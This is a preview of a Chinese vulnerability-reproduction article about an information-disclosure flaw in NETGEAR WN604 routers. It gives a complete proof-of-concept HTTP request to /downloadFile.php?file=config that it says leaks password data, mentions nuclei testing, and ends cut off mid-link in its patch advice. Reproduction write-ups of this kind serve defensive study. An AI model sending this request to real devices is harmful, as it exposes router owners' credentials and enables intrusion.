文章预览
网安引领时代,弥天点亮未来 0x00写在前面 本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责! 0x01漏洞介绍 NETGEAR WN604是美国网件(NETGEAR)公司的一款小型无线路由器。 NETGEAR WN604 20240710及之前版本存在信息泄露漏洞,该漏洞源于文件/downloadFile.php的参数file会导致信息泄露。 0x02影响版本 WN604==20240710 0x03漏洞复现 1.访问漏洞环境 2.对漏洞进行复现 POC 漏洞复现 GET /downloadFile.php?file=config HTTP/1.1 Host : 127.0.0.1 User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Accept-Encoding : gzip, deflate Accept-Language: en 泄露用户密码信息。 3. Yakit工具加载nuclei文件测试(漏洞存在) 0x04修复建议 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: https: / /www.netgear.com/uk https: / /gith
………………………………
